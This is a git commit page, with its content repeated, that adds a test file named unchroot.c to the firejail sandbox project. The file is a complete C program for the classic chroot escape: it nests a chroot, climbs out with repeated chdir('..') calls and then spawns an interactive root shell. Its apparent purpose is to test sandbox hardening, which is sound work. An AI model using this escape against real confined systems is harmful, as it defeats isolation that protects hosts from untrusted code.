chroot testing

author: netblue30 <netblue30@yahoo.com> 2016-11-20 16:05:45 -0500
committer: netblue30 <netblue30@yahoo.com> 2016-11-20 16:05:45 -0500
commit: 80cc5fa809ebb3f213852312dea15cded00cc069 (patch)
tree: 2f233a23c075a0dd2e89b32b37b09fce06b13058 /test/chroot/unchroot.c
parent: seccomp work 2 (diff)
download: firejail-80cc5fa809ebb3f213852312dea15cded00cc069.tar.gz
firejail-80cc5fa809ebb3f213852312dea15cded00cc069.tar.zst
firejail-80cc5fa809ebb3f213852312dea15cded00cc069.zip
1 files changed, 40 insertions, 0 deletions
diff --git a/test/chroot/unchroot.c b/test/chroot/unchroot.c
new file mode 100644
index 000000000..1982e07f3
--- /dev/null
+++ b/test/chroot/unchroot.c
@@ -0,0 +1,40 @@
+// simple unchroot example from http://linux-vserver.org/Secure_chroot_Barrier
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+void die(char *msg) {
+        perror(msg);
+        exit(1);
+}
+int main(int argc, char *argv[])
+{
+        int i;
+        
+        if (chdir("/") != 0)
+                die("chdir(/)");
+        
+        if (mkdir("baz", 0777) != 0)
+                ; //die("mkdir(baz)");
+        
+        if (chroot("baz") != 0)
+                die("chroot(baz)");
+        
+        for (i=0; i<50; i++) {
+                if (chdir("..") != 0)
+                        die("chdir(..)");
+        }
+        
+        if (chroot(".") != 0)
+                die("chroot(.)");
+        
+        printf("Exploit seems to work. =)\n");
+        
+        execl("/bin/bash", "bash", "-i", (char *)0);
+        die("exec bash");
+        
+        exit(0);
+}
author	netblue30 <netblue30@yahoo.com>	2016-11-20 16:05:45 -0500
committer	netblue30 <netblue30@yahoo.com>	2016-11-20 16:05:45 -0500
commit	80cc5fa809ebb3f213852312dea15cded00cc069 (patch)
tree	2f233a23c075a0dd2e89b32b37b09fce06b13058 /test/chroot/unchroot.c
parent	seccomp work 2 (diff)
download	firejail-80cc5fa809ebb3f213852312dea15cded00cc069.tar.gz firejail-80cc5fa809ebb3f213852312dea15cded00cc069.tar.zst firejail-80cc5fa809ebb3f213852312dea15cded00cc069.zip

diff --git a/test/chroot/unchroot.c b/test/chroot/unchroot.c new file mode 100644 index 000000000..1982e07f3 --- /dev/null +++ b/test/chroot/unchroot.c
@@ -0,0 +1,40 @@
	1	// simple unchroot example from http://linux-vserver.org/Secure_chroot_Barrier
	2	#include <unistd.h>
	3	#include <stdlib.h>
	4	#include <stdio.h>
	5	#include <sys/types.h>
	6	#include <sys/stat.h>
	7
	8	void die(char *msg) {
	9	perror(msg);
	10	exit(1);
	11	}
	12
	13	int main(int argc, char *argv[])
	14	{
	15	int i;
	16
	17	if (chdir("/") != 0)
	18	die("chdir(/)");
	19
	20	if (mkdir("baz", 0777) != 0)
	21	; //die("mkdir(baz)");
	22
	23	if (chroot("baz") != 0)
	24	die("chroot(baz)");
	25
	26	for (i=0; i<50; i++) {
	27	if (chdir("..") != 0)
	28	die("chdir(..)");
	29	}
	30
	31	if (chroot(".") != 0)
	32	die("chroot(.)");
	33
	34	printf("Exploit seems to work. =)\n");
	35
	36	execl("/bin/bash", "bash", "-i", (char *)0);
	37	die("exec bash");
	38
	39	exit(0);
	40	}